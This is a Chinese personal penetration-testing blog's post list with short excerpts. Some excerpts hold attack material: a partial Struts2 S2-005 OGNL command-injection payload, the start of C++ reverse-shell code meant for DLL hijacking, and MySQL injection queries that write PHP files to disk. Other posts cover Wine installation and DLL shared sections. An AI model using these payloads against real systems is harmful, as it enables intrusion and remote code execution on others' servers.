记一次struts2-005

时间:2018-3-26   作者:webbaozi   分类: 渗透测试   热度:263°    
时间:2018-3-26   分类: 渗透测试    热度:263  
如图: 执行id参数可以成功执行,但是当命令中含有空格时执行命令就会失败。 然后调试发现把命令中的空格换成\40即可成功执行命令 这里附上s2_005的命令: ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]

阅读全文>>

热门 centos 7安装wine 32

时间:2018-2-1   作者:webbaozi   分类: 实用工具   热度:730°    
时间:2018-2-1   分类: 实用工具    热度:730  
这里的下载的地址打不开需要更换一个(我安装的是1.7.40) 1. wget http://citylan.dl.sourceforge.net/project/wine/Source/wine-1.7.33.tar.bz2 2. tar -xf wine-1.7.33.tar.bz2 3. yum -y groupinstall 'Development Tools' 4. yum -y install libX11-devel fre...

阅读全文>>

热门 .net突破限制执行命令

时间:2017-12-28   作者:webbaozi   分类: 小技巧   热度:1115°    
时间:2017-12-28   分类: 小技巧    热度:1115  
遇见过一次可以使用 受影响的版本为: Microsoft .NET Framework 2.0  Microsoft .NET Framework 3.5 Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4 Microsoft .NET Framework 4.5 Microsoft .NET Framework 4.5.1 利用条件: 1.需要支持aspx并且高于Microsoft .NET Framework 1.14版本 2....

阅读全文>>

热门 dll和exe的共享节------多进程共享dll/exe全局变量

时间:2017-11-17   作者:webbaozi   分类: 个人笔记   热度:944°    
时间:2017-11-17   分类: 个人笔记    热度:944  
测试一个软件时,软件会多次调用同一dll,但是只想软件启动只调用一次自定义函数 可以使用共享节来处理: #pragma data_seg("Shared") int g_data = 0; #pragma data_seg() #pragma comment(linker,"/section:Shared,rws") 我们也可以定义自己的共享节: #pragma data_seg("Shared") int g_data=0; #pragma data_seg() ...

阅读全文>>

热门 c++反弹代码

时间:2017-10-30   作者:webbaozi   分类: 渗透测试   热度:905°    
时间:2017-10-30   分类: 渗透测试    热度:905  
在dll劫持中使用挺不错的,之前放在nopad++中,成功反弹。 代码如下: LPCSTR szMyUniqueNamedEvent = "sysnullevt"; HANDLE m_hEvent = CreateEventA(NULL, TRUE, FALSE, szMyUniqueNamedEvent); switch (GetLastError()) { // app is already running case ERROR_ALREADY_EXISTS: { CloseHandle(m_hEvent); bre...

阅读全文>>

热门 通过mysql注入写文件

时间:2017-10-30   作者:webbaozi   分类: 小技巧   热度:1127°    
时间:2017-10-30   分类: 小技巧    热度:1127  
1. select * from admin where id =-1 union select 1,'<?php phpinfo();?>',3,4 into outfile 'c:\\1.php'   2. select * from admin where id =-1 or 1=1 limit 0,1 INTO OUTFILE 'c:/2.php' LINES TERMINATED BY 0x3C3F70687020706870696E666F28293B3F3E-- 此写法需要查询出数据,才能...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1